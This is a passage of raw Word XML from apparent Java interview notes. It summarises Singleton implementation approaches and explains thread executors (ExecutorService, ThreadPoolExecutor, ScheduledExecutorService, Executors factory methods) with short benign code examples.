          <w:numId w:val="1250"/>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lastRenderedPageBreak/>
        <w:t>Simplest implementation and immune to serialization issues that can affect other Singleton approaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC21515" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>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isadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: None, it's the most reliable and straightforward Singleton implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AF880B" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E02D76E" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1251"/>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Eager Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable when the instance creation is lightweight and the instance is always needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0F4ABC" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1251"/>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Lazy Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can be used but requires synchronization to ensure thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2FBD7" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1251"/>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Double-Checked Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More efficient than synchronized methods and is the recommended approach for most cases where the Singleton instance needs to be created lazily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C745685" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1251"/>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Bill Pugh Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Simple, efficient, and thread-safe. Ideal for use when you need a thread-safe Singleton.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16283058" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1251"/>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Enum-based Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The most robust and simplest way to implement a Singleton in Java. It handles all the edge cases and is inherently thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3558B" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB"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Each of these approaches has its own use cases, but generally, </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bill Pugh Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enum-based Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the preferred methods in modern Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7915A" w14:textId="5040CEFE" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000962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F1B2AAB">
          <v:rect id="_x0000_i1862" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D4899" w14:textId="77777777" w:rsidR="002A196E" w:rsidRPr="00CE4B95" w:rsidRDefault="002A196E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="291" w:name="_Toc196307771"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Thread executors?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="291"/>
    </w:p>
    <w:p w14:paraId="01DD982A" w14:textId="48A97AE6" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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In Java, </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Executors</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide a higher-level replacement for the traditional way of managing threads using Thread or Runnable. They manage the creation, execution, and scheduling of threads in a more flexible and efficient way. Executors are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package, and they help improve the performance and scalability of applications that involve multithreading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D23292C" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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Key Benefits of Using Thread Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF5361" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>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Thread Pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executors manage a pool of threads, so that the overhead of creating new threads for every task is avoided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505E8B47" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>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Task Scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executors can manage tasks in a way that avoids issues like thread starvation or resource contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5611F0DE" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>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Thread Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executors allow threads to be reused, reducing the overhead of thread creation and destruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095258D5" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>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Better Resource Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executors provide better management and utilization of system resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3726913C" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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Types of Executors in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E8AEE"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ere are several implementations of the Executor interface provided in the java.util.concurrent package. Let's discuss the most commonly used ones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2644A806" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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1. Executor Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EEC6AC"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e Executor interface provides a simple mechanism to submit tasks for execution. It has a single method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D487BD2"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void execute(Runnable command);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C2D7C5"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is interface is very simple and doesn't return any result. It only executes the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC680C" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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2. ExecutorService Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B907923"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ExecutorService is an extension of the Executor interface, providing more powerful features like the ability to manage lifecycle of tasks and handle shutdown. Some key methods provided by ExecutorService are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00841952" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125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submit(Callable&lt;T&gt; task) — Submits a task for execution and returns a Future object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CC1DF4" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125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invokeAll(Collection&lt;? extends Callable&lt;T&gt;&gt; tasks) — Executes a collection of tasks and returns a list of Future objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA5F834" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125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shutdown() — Initiates an orderly shutdown where previously submitted tasks are executed, but no new tasks will be accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2FAAAC" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125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shutdownNow() — Attempts to stop all actively executing tasks, halts the processing of waiting tasks, and returns a list of the tasks that were waiting to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B362C7" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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3. ThreadPoolExecutor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E11B0C"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readPoolExecutor is one of the most commonly used implementations of the ExecutorService interface. It manages a pool of worker threads that can execute tasks concurrently. It provides many configuration options like core pool size, maximum pool size, and thread keep-alive time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD78263"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You can configure the thread pool with parameters like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B1E071" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1254"/>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corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The number of threads to keep in the pool, even if they are idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC05AC" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1254"/>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maximumPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The maximum number of threads allowed in the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41728149" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1254"/>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keepAliveTime</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The time for which an idle thread should wait before terminating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D69347" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1254"/>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BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A queue to hold tasks before they are executed by threads in the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DCE8C1"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Here's an example of using ThreadPoolExecutor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA056A"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import java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E6A0E" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56077DEA"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public class ThreadPoolExecutorExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78766A3F"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D6F6D5"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Create a thread pool with 2 core threads and a maximum of 4 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC844A2"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ExecutorService executor = new ThreadPoolExecutor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FDF369"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2, 4, 60, TimeUnit.SECONDS, new LinkedBlockingQueue&lt;Runnable&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006FE6F4"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5FFBD004" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A681E31"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Submit a task to the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B22F4"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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E58CCB9"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System.out.println("Task executed by: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB2A622"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239C206C" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3794A04F"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Shut down the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD6BEB4"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executor.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585EEE95"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4CF3B93F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D168E0A" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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4. ScheduledExecutorService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2553DB8B"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ScheduledExecutorService is another important extension of ExecutorService that allows you to schedule tasks for future execution. It is used for tasks that need to be executed periodically or after a delay. It has methods like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A2908" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>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schedule(Runnable command, long delay, TimeUnit unit) — Schedules a task to run after a specified delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4E0F7" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>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scheduleAtFixedRate(Runnable command, long initialDelay, long period, TimeUnit unit) — Schedules a task to run at a fixed-rate periodic interval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43571B07" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>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scheduleWithFixedDelay(Runnable command, long initialDelay, long delay, TimeUnit unit) — Schedules a task to run with a fixed-delay interval between the end of the last execution and the start of the next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB4B754"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Example of using ScheduledExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E9FEE9"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import java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E511F9" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FEF7BC9"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public class ScheduledExecutorServiceExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516CB173"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E0641D"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ScheduledExecutorService scheduler = Executors.newScheduledThreadPool(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286D967C" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F32E6BF"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Schedule a task to run after a 2-second delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECADCBE"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scheduler.schedule(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37833712"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System.out.println("Task executed at: " + System.currentTimeMillis());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE48368"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2, TimeUnit.SECONDS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C920CC4" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0088D4"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Schedule a task to run at a fixed-rate (every 3 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118E0DC0"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scheduler.scheduleAtFixedRate(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B24556"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System.out.println("Task executed periodically at: " + System.currentTimeMillis());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1AABC3"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0, 3, TimeUnit.SECONDS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C4888"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4CB76A70"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B2D25" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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5. Executors Utility Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177FB1D8"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e Executors utility class provides factory methods to create commonly used executor service implementations. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D6774D" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125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newFixedThreadPool(int nThreads) — Creates a thread pool that reuses a fixed number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB718D" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125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newCachedThreadPool() — Creates a thread pool that creates new threads as needed but reuses idle threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A303159" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125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newSingleThreadExecutor() — Creates an executor that uses a single worker thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E1F861" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125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newScheduledThreadPool(int corePoolSize) — Creates a thread pool for scheduling tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19025AF0"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Example of creating a fixed thread pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A67576C"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ExecutorService executor = Executors.newFixedThreadPool(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3991807C" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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Example: Using ExecutorService for Concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFADC02"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import java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD6ECBA" w14:textId="77777777" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
